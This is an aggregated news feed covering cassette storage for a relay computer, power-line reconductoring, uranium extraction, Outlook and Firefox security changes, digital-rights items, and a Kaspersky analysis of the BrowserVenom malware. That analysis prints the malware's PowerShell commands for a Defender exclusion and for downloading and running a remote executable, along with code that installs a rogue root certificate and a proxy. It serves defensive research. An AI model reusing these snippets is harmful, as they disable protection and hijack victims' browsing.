Magnetic tape storage is something many of us will associate with 8-bit microcomputers or 1960s mainframe computers, but it still has a place in the modern data center for long-term backups. It’s likely not to be the first storage tech that would spring to mind when considering a relay computer, but that’s just what [DiPDoT] has done by giving his machine tape storage.

We like this hack, in particular because it’s synchronous. Where the cassette storage of old just had the data stream, this one uses both channels of a stereo cassette deck, one for clock and the other data. It’s encoded as a sequence of tones, which are amplified at playback (by a tube amp, of course) to drive a rectifier which fires the relay.

On the record side the tones are made by an Arduino, something which we fully understand but at the same time can’t help wondering whether something electromechanical could be used instead. Either way, it works well enough to fill a relay shift register with each byte, which can then be transferred to the memory. It’s detailed in a series of videos, the first of which we’ve paced below the break.

If you want more cassette tape goodness, while this may be the slowest, someone else is making a much faster cassette interface.

youtube.com/embed/3r_vtB9umZ4?…

hackaday.com/2025/06/11/this-r…

What happens when you build the largest machine in the world, but it’s still not big enough? That’s the situation the North American transmission system, the grid that connects power plants to substations and the distribution system, and which by some measures is the largest machine ever constructed, finds itself in right now. After more than a century of build-out, the towers and wires that stitch together a continent-sized grid aren’t up to the task they were designed for, and that’s a huge problem for a society with a seemingly insatiable need for more electricity.

There are plenty of reasons for this burgeoning demand, including the rapid growth of data centers to support AI and other cloud services and the move to wind and solar energy as the push to decarbonize the grid proceeds. The former introduces massive new loads to the grid with millions of hungry little GPUs, while the latter increases the supply side, as wind and solar plants are often located out of reach of existing transmission lines. Add in the anticipated expansion of the manufacturing base as industry seeks to re-home factories, and the scale of the potential problem only grows.

The bottom line to all this is that the grid needs to grow to support all this growth, and while there is often no other solution than building new transmission lines, that’s not always feasible. Even when it is, the process can take decades. What’s needed is a quick win, a way to increase the capacity of the existing infrastructure without having to build new lines from the ground up. That’s exactly what reconductoring promises, and the way it gets there presents some interesting engineering challenges and opportunities.

Bare Metal

Copper is probably the first material that comes to mind when thinking about electrical conductors. Copper is the best conductor of electricity after silver, it’s commonly available and relatively easy to extract, and it has all the physical characteristics, such as ductility and tensile strength, that make it easy to form into wire. Copper has become the go-to material for wiring residential and commercial structures, and even in industrial installations, copper wiring is a mainstay.

However, despite its advantages behind the meter, copper is rarely, if ever, used for overhead wiring in transmission and distribution systems. Instead, aluminum is favored for these systems, mainly due to its lower cost compared to the equivalent copper conductor. There’s also the factor of weight; copper is much denser than aluminum, so a transmission system built on copper wires would have to use much sturdier towers and poles to loft the wires. Copper is also much more subject to corrosion than aluminum, an important consideration for wires that will be exposed to the elements for decades.
ACSR (left) has a seven-strand steel core surrounded by 26 aluminum conductors in two layers. ACCC has three layers of trapezoidal wire wrapped around a composite carbon fiber core. Note the vastly denser packing ratio in the ACCC. Source: Dave Bryant, CC BY-SA 3.0.
Aluminum has its downsides, of course. Pure aluminum is only about 61% as conductive as copper, meaning that conductors need to have a larger circular area to carry the same amount of current as a copper cable. Aluminum also has only about half the tensile strength of copper, which would seem to be a problem for wires strung between poles or towers under a lot of tension. However, the greater diameter of aluminum conductors tends to make up for that lack of strength, as does the fact that most aluminum conductors in the transmission system are of composite construction.

The vast majority of the wires in the North American transmission system are composites of aluminum and steel known as ACSR, or aluminum conductor steel-reinforced. ACSR is made by wrapping high-purity aluminum wires around a core of galvanized steel wires. The core can be a single steel wire, but more commonly it’s made from seven strands, six wrapped around a single central wire; especially large ACSR might have a 19-wire core. The core wires are classified by their tensile strength and the thickness of their zinc coating, which determines how corrosion-resistant the core will be.

In standard ACSR, both the steel core and the aluminum outer strands are round in cross-section. Each layer of the cable is twisted in the opposite direction from the previous layer. Alternating the twist of each layer ensures that the finished cable doesn’t have a tendency to coil and kink during installation. In North America, all ACSR is constructed so that the outside layer has a right-hand lay.

ACSR is manufactured by machines called spinning or stranding machines, which have large cylindrical bodies that can carry up to 36 spools of aluminum wire. The wires are fed from the spools into circular spinning plates that collate the wires and spin them around the steel core fed through the center of the machine. The output of one spinning frame can be spooled up as finished ACSR or, if more layers are needed, can pass directly into another spinning frame for another layer of aluminum, in the opposite direction, of course.

youtube.com/embed/TVdOpiER8Xc?…

Fiber to the Core

While ACSR is the backbone of the grid, it’s not the only show in town. There’s an entire beastiary of initialisms based on the materials and methods used to build composite cables. ACSS, or aluminum conductor steel-supported, is similar to ACSR but uses more steel in the core and is completely supported by the steel, as opposed to ACSR where the load is split between the steel and the aluminum. AAAC, or all-aluminum alloy conductor, has no steel in it at all, instead relying on high-strength aluminum alloys for the necessary tensile strength. AAAC has the advantage of being very lightweight as well as being much more resistant to core corrosion than ACSR.

Another approach to reducing core corrosion for aluminum-clad conductors is to switch to composite cores. These are known by various trade names, such as ACCC (aluminum conductor composite core) or ACCR (aluminum conductor composite reinforced). In general, these cables are known as HTLS, which stands for high-temperature, low-sag. They deliver on these twin promises by replacing the traditional steel core with a composite material such as carbon fiber, or in the case of ACCR, a fiber-reinforced metal matrix.

The point of composite cores is to provide the conductor with the necessary tensile strength and lower thermal expansion coefficient, so that heating due to loading and environmental conditions causes the cable to sag less. Controlling sag is critical to cable capacity; the less likely a cable is to sag when heated, the more load it can carry. Additionally, composite cores can have a smaller cross-sectional area than a steel core with the same tensile strength, leaving room for more aluminum in the outer layers while maintaining the same overall conductor diameter. And of course, more aluminum means these advanced conductors can carry more current.

Another way to increase the capacity in advanced conductors is by switching to trapezoidal wires. Traditional ACSR with round wires in the core and conductor layers has a significant amount of dielectric space trapped within the conductor, which contributes nothing to the cable’s current-carrying capacity. Filling those internal voids with aluminum is accomplished by wrapping round composite cores with aluminum wires that have a trapezoidal cross-section to pack tightly against each other. This greatly reduces the dielectric space trapped within a conductor, increasing its ampacity within the same overall diameter.

Unfortunately, trapezoidal aluminum conductors are much harder to manufacture than traditional round wires. While creating the trapezoids isn’t that much harder than drawing round aluminum wire — it really just requires switching to a different die — dealing with non-round wire is more of a challenge. Care must be taken not to twist the wire while it’s being rolled onto its spools, as well as when wrapping the wire onto the core. Also, the different layers of aluminum in the cable require different trapezoidal shapes, lest dielectric voids be introduced. The twist of the different layers of aluminum has to be controlled, too, just as with round wires. Trapezoidal wires can also complicate things for linemen in the field in terms of splicing and terminating cables, although most utilities and cable construction companies have invested in specialized tooling for advanced conductors.

Same Towers, Better Wires

The grid is what it is today in large part because of decisions made a hundred or more years ago, many of which had little to do with engineering. Power plants were located where it made sense to build them relative to the cities and towns they would serve and the availability of the fuel that would power them, while the transmission lines that move bulk power were built where it was possible to obtain rights-of-way. These decisions shaped the physical footprint of the grid, and except in cases where enough forethought was employed to secure rights-of-way generous enough to allow for expansion of the physical plant, that footprint is pretty much what engineers have to work with today.

Increasing the amount of power that can be moved within that limited footprint is what reconductoring is all about. Generally, reconductoring is pretty much what it sounds like: replacing the conductors on existing support structures with advanced conductors. There are certainly cases where reconductoring alone won’t do, such as when new solar or wind plants are built without existing transmission lines to connect them to the system. In those cases, little can be done except to build a new transmission line. And even where reconductoring can be done, it’s not cheap; it can cost 20% more per mile than building new towers on new rights-of-way. But reconductoring is much, much faster than building new lines. A typical reconductoring project can be completed in 18 to 36 months, as compared to the 5 to 15 years needed to build a new line, thanks to all the regulatory and legal challenges involved in obtaining the property to build the structures on. Reconductoring usually faces fewer of these challenges, since rights-of-way on existing lines were established long ago.

The exact methods of reconductoring depend on the specifics of the transmission line, but in general, reconductoring starts with a thorough engineering evaluation of the support structures. Since most advanced conductors are the same weight per unit length as the ACSR they’ll be replacing, loads on the towers should be about the same. But it’s prudent to make sure, and a field inspection of the towers on the line is needed to make sure they’re up to snuff. A careful analysis of the design capacity of the new line is also performed before the project goes through the permitting process. Reconductoring is generally performed on de-energized lines, which means loads have to be temporarily shifted to other lines, requiring careful coordination between utilities and transmission operators.

Once the preliminaries are in place, work begins. Despite how it may appear, most transmission lines are not one long cable per phase that spans dozens of towers across the countryside. Rather, most lines span just a few towers before dead-ending into insulators that use jumpers to carry current across to the next span of cable. This makes reconductoring largely a tower-by-tower affair, which somewhat simplifies the process, especially in terms of maintaining the tension on the towers while the conductors are swapped. Portable tensioning machines are used for that job, as well as for setting the proper tension in the new cable, which determines the sag for that span.

The tooling and methods used to connect advanced conductors to fixtures like midline splices or dead-end adapters are similar to those used for traditional ACSR construction, with allowances made for the switch to composite cores from steel. Hydraulic crimping tools do most of the work of forming a solid mechanical connection between the fixture and the core, and then to the outer aluminum conductors. A collet is also inserted over the core before it’s crimped, to provide additional mechanical strength against pullout.

youtube.com/embed/QD7_7t4SeVY?…

Is all this extra work to manufacture and deploy advanced conductors worth it? In most cases, the answer is a resounding “Yes.” Advanced conductors can often carry twice the current as traditional ACSR or ACCC conductors of the same diameter. To take things even further, advanced AECC, or aluminum-encapsulated carbon core conductors, which use pretensioned carbon fiber cores covered by trapezoidal annealed aluminum conductors, can often triple the ampacity of equivalent-diameter ACSR.

Doubling or trebling the capacity of a line without the need to obtain new rights-of-way or build new structures is a huge win, even when the additional expense is factored in. And given that an estimated 98% of the existing transmission lines in North America are candidates for reconductoring, you can expect to see a lot of activity under your local power lines in the years to come.

hackaday.com/2025/06/11/recond…

Il mese prossimo, Outlook Web e il nuovo Outlook per Windows amplieranno l’elenco degli allegati bloccati, ha annunciato Microsoft. A partire da luglio 2025, Outlook bloccherà i file .library-ms e .search-ms.

“Nell’ambito dei nostri continui sforzi per migliorare la sicurezza di Outlook Web e del nuovo Outlook per Windows, stiamo aggiornando l’elenco dei tipi di file bloccati predefiniti in OwaMailboxPolicy. A partire dall’inizio di luglio 2025, i tipi di file [.library-ms e .search-ms] verranno aggiunti all’elenco BlockedFileTypes”, ha scritto l’azienda.

I file .library-ms (in Windows definiscono librerie che combinano cartelle locali e remote in un’unica visualizzazione di Explorer) sono stati utilizzati negli attacchi di phishing dall’inizio del 2025. Tali file sono stati utilizzati per attaccare organizzazioni governative e aziende private e sfruttare la vulnerabilità CVE-2025-24054, che espone gli hash NTLM.

Il gestore URI del protocollo search-ms è stato utilizzato dai phisher almeno da giugno 2022, quando Matthew Hickey, co-fondatore di Hacker House e ricercatore di sicurezza, ha scoperto che poteva usare search-ms e il problema CVE-2022-30190 per avviare automaticamente le finestre di ricerca di Windows sui dispositivi dei destinatari, inducendoli a eseguire malware.

“I nuovi tipi di file bloccati vengono utilizzati raramente, quindi la maggior parte delle organizzazioni non sarà interessata da questa modifica. Tuttavia, se gli utenti inviano o ricevono questi allegati, non saranno più in grado di aprirli o scaricarli in Outlook Web o nel nuovo Outlook per Windows”, avverte Microsoft.

“Se l’organizzazione non utilizza questi tipi di file, non è necessario intraprendere alcuna azione. L’aggiornamento verrà applicato automaticamente a tutti i criteri cassetta postale di OWA. Tuttavia, se è necessario consentire questi tipi di file, è possibile includerli in AllowedFileTypes in OwaMailboxPolicy prima di distribuire l’aggiornamento”. Per un elenco completo degli allegati attualmente bloccati in Outlook, consultare la documentazione Microsoft.

Ricordiamo che Microsoft ha una lunga storia di rimozione e disabilitazione di diverse funzionalità di Office e Windows che vengono utilizzate impropriamente dagli hacker. Ad esempio, nel 2018, l’azienda ha ampliato il supporto di Antimalware Scan Interface (AMSI) per le applicazioni client di Office 365 per bloccare gli attacchi che utilizzano macro VBA.

Da allora, l’azienda ha iniziato a bloccare le macro VBA per impostazione predefinita, ha disabilitato le macro di Excel 4.0 (XLM), ha introdotto la protezione per le macro XLM e ha iniziato a bloccare i componenti aggiuntivi XLL non attendibili per impostazione predefinita in tutti i tenant di Microsoft 365.

Inoltre, a maggio dell’anno scorso, Microsoft ha annunciato la dismissione di VBScript e ad aprile 2025 ha annunciato la disattivazione di tutti i controlli ActiveX nelle versioni Windows delle applicazioni Microsoft 365 e Office 2024.

L'articolo Microsoft blocca nuovi allegati su Outlook! Stop ai file usati dagli hacker nelle email di Phishing proviene da il blog della sicurezza informatica.

Privacy International investigated eight of the most popular period-tracking apps to analyse how they function and process users’ reproductive health data. Their findings raised concerns for users’ privacy, given the sensitive nature of the health data involved. These findings come within the context of the global roll back on reproductive rights and fears over law enforcement forcing apps to hand over data.

The post All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world appeared first on European Digital Rights (EDRi).

European Parliament's LIBE committee vote on a reform of the Europol Regulation was a mixed bag. Although it was a blow to the European Commission's original proposal, it still legitimised an expanding surveillance regime thanks to Europol's ever-growing power and resources. Read the Protect Not Surveil coalition’s statement.

The post LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime appeared first on European Digital Rights (EDRi).

As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.
The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.

Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO₂ deposited on the cathode and U₃O₈ on the anode.

Among the reported performance statistics of this prototype are the ability to extract UO₂²⁺ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl^– ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.

The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.

hackaday.com/2025/06/11/bipola…

Mozilla ha sviluppato una nuova funzionalità di sicurezza che aiuterà a bloccare le estensioni dannose di Firefox che rubano criptovalute agli utenti. Gli sviluppatori segnalano che il nuovo sistema crea profili di rischio per ogni estensione del portafoglio presentata nello store e avvisa automaticamente dei rischi se viene raggiunta una soglia specificata.

Questi avvisi hanno lo scopo di incoraggiare le persone che esaminano i componenti aggiuntivi a esaminarli più attentamente e a rimuovere quelli dannosi dallo store prima che vengano utilizzati per svuotare i portafogli crittografici degli utenti.

“Per proteggere gli utenti di Firefox, il team Add-ons Operations ha sviluppato un sistema di pre-rilevamento progettato per identificare e bloccare le estensioni fraudolente per criptovalute prima che cadano nelle mani di utenti ignari”, afferma il team. “Il primo livello di protezione prevede indicatori automatici che determinano il profilo di rischio delle estensioni per wallet elencate su addons.mozilla.org.

Se un’estensione per wallet raggiunge un certo livello di rischio, i revisori umani vengono avvisati per condurre un’analisi più approfondita. Se l’estensione viene ritenuta dannosa, viene immediatamente bloccata.”

Andreas Wagner, specialista in operazioni di componenti aggiuntivi e responsabile del sistema di revisione dei contenuti e della sicurezza di addons.mozilla.org, sottolinea che negli ultimi anni il suo team ha scoperto e rimosso centinaia di estensioni dannose, tra cui wallet di criptovalute fraudolenti.

“È un continuo gioco del gatto e del topo, con gli sviluppatori che cercano di aggirare i nostri metodi di rilevamento”, spiega Wagner. “Controlla il sito web del tuo portafoglio di criptovalute per vedere se ha un’estensione ufficiale e usa solo quelle linkate sul sito ufficiale.”

L'articolo Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox proviene da il blog della sicurezza informatica.

Introduction

DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure

The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer

The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
   The AES encryption information is hardcoded in the implant:

   Type	AES-256-CBC
   Key	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
   IV	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

   The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
   powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
   It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
   $b = $null;
   foreach($i in 0..1000000) {
   $s = if ($i - gt 0) {
   $i
   } else {
   ""
   };
   $d = "https://app-updater$s.app$ap";
   $b = (New - Object Net.WebClient).DownloadData($d);
   if ($b) {
   break
   }

   };
   if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
   [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
   Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
   } else {
   ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
   }
   At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.

Loaded implant: BrowserVenom

We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion

As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes

d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs

securelist.com/browservenom-mi…

Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.

A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.

As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”

Read the whole article here.

freedom.press/issues/texas-is-…